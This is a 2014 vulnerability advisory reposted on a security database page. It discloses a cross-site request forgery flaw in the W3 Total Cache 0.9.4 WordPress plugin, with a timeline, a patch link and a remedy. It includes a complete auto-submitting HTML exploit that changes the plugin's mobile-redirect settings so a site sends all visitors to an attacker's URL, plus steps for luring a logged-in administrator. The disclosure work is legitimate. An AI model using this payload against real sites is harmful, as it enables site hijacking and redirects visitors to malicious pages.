Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:31526
HistoryDec 22, 2014 - 12:00 a.m.

W3TotalFail: W3 Total Cache v 0.9.4 CSRF Vulnerability that Leads to Full Deface

2014-12-2200:00:00
vulners.com
14
JSON

Title: W3TotalFail: W3 Total Cache v 0.9.4 CSRF Vulnerability that Leads to Full Deface

Author: Mazin Ahmed

Date of Discovering: October 6th, 2014

Date of Reporting to the Vendor: October 7th, 2014

Date of Releasing a Patch: December 9th, 2014

Vulnerability Type: Cross-Site Request Forgery (CSRF) - CWE-352

Vendor Homepage: https://www.w3-edge.com/

Affected Version: 0.9.4, previous versions might be vulnerable as well.

Affected Software Link: https://downloads.wordpress.org/plugin/w3-total-cache.0.9.4.zip

Patch Link: https://downloads.wordpress.org/plugin/w3-total-cache.0.9.4.1.zip

Tested on: Wordpress 4.0

Blog Post: http://mazinahmed1.blogspot.com/2014/12/w3-total-caches-w3totalfail.html

POC Video: https://www.youtube.com/watch?v=JwRteg7Iqyw

###Description:
W3 Total Cache v0.9.4 is vulnerable to a critical Cross-Site Request Forgery issue. It occurs because of the invalidation of the CSRF token "_wpnonce". This CSRF issue can be used to perform many actions, but the most significant action that has the biggest impact on users is redirecting users to malicious websites. This can be happened by using the feature of specify particular user-agents to be redirected to mobile site. By crafting an exploit that forces the victim to change the policy feature's policy to redirect every user who visit the victim's website to be redirected to a specific website that is specified by the attacker. This can be done by adding all the common keywords that is used on user-agents.

###Exploit:

<html>
<body onload="javascript:document.csrf_form.submit()">
<form method="post" action="http://localhost/wordpress/wp-admin/admin.php?page=w3tc_mobile&quot; name="csrf_form">
<input type="hidden" name="mobile_groups[exploit_by_mazen160][enabled]" value="0">
<input type="hidden" name="mobile_groups[exploit_by_mazen160][enabled]" value="1">
<input type="hidden" name="mobile_groups[exploit_by_mazen160][theme]" value="">
<input type="hidden" name="mobile_groups[exploit_by_mazen160][redirect]" value="https://twitter.com/mazen160&quot;&gt;
<input type="hidden" name="mobile_groups[exploit_by_mazen160][agents]" value="Mozilla
Opera
iTunes
ELinks
Links
Konqueror
Midori
Uzbl (Webkit 1.3)
w3m
Lynx
POLARIS
nook
BlackBerry
LG
MOT
Nokia
SEC
Sony
Baiduspider
Google
msnbot
Email
Gaisbot
grub
Download
Wget
curl">
<input type="hidden" name="_wp_http_referer=" value="http://localhost/wordpress/wp-admin/admin.php?page=w3tc_mobile&quot;&gt;
<input type="hidden" name="w3tc_save_options" value="Save+all+settings"/>
<input type="hidden" name="_wpnonce" value="">
<input type="hidden" name="w3tc_note" value="config_save">
</form>
</body>
</html>

###Vulnerable Versions:
The issue has been confirmed on W3 Total Cache (v0.9.4). Previous versions might be vulnerable as well.

###Severity: Critical

###Steps to Reproduce:
1- An attacker uploads the exploit to an accessible server
2- The attacker sends a link of the exploit to the victim (who is using W3 Total Cache)
3- The victim clicks on the link (while he is authenticated), and the exploit run on the victim's client-side
4- The victim's website settings will be changed, and anyone who visits the victim's website will be redirected to the attacker's malicious website.

###Remedy:
Update W3 Total Cache plugin to the latest version.

Best Regards,
Mazin Ahmed
https://twitter.com/mazen160
http://mazinahmed1.blogspot.com
https://linkedin.com/pub/mazin-ahmed/86/795/629

JSON